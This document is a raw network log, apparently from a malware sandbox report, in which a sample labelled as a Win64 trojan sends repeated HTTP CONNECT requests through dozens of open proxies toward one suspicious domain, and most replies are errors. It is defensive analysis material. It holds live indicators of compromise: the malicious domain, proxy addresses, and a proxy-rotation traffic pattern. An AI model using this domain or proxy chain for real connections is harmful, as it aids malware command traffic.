                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.038391113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1795192.168.2.855223104.25.115.125805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.885034084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.974201918 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1796192.168.2.85520659.125.232.28805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.931212902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1797192.168.2.85492641.174.152.22656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.949567080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1798192.168.2.854961132.148.129.254453665828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.973929882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.991965055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.038389921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.101079941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:05.100951910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:17.116592884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1799192.168.2.855247104.16.108.42805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.001595020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.089862108 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1800192.168.2.855226107.181.148.18760475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.012748003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.378349066 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1801192.168.2.85521049.228.131.16950005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.012748003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1802192.168.2.855277104.19.85.214805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.033509970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.120872974 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1803192.168.2.855297185.162.228.170805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.034087896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.121854067 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1804192.168.2.855062192.252.216.8141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.038925886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1805192.168.2.85491572.195.114.16941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.059891939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1806192.168.2.854994178.249.218.3456785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.070202112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1807192.168.2.854982189.240.60.16390905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.094831944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.415110111 CET72INHTTP/1.1 200 Connection established
                                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1808192.168.2.85530212.186.205.121805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.130291939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.256195068 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.1
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1809192.168.2.855207107.148.201.157805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.152622938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.179192066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1810192.168.2.85528591.189.177.18631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.198451042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.750113010 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/5.7
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3532
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                X-Cache: MISS from lb1
                                                                                X-Cache-Lookup: NONE from lb1:3128
                                                                                Via: 1.1 lb1 (squid/5.7)
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1811192.168.2.855213188.166.197.12931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.228851080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1812192.168.2.85529445.11.95.16550405828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.251672983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1813192.168.2.855304212.31.100.13841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.260425091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1814192.168.2.85527591.107.123.18910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.260428905 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:41.472073078 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1815192.168.2.851906193.239.56.8480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.263751030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1816192.168.2.85503580.80.162.81108055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.263832092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1817192.168.2.85526843.156.0.12588885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.290761948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.179184914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.514432907 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.24.0
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1818192.168.2.855008103.76.190.37317565828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.292192936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1819192.168.2.855141106.74.26.2631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.329457998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.913789988 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1820192.168.2.855242103.153.232.4180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.329667091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.195027113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.398493052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.846374989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.585659027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
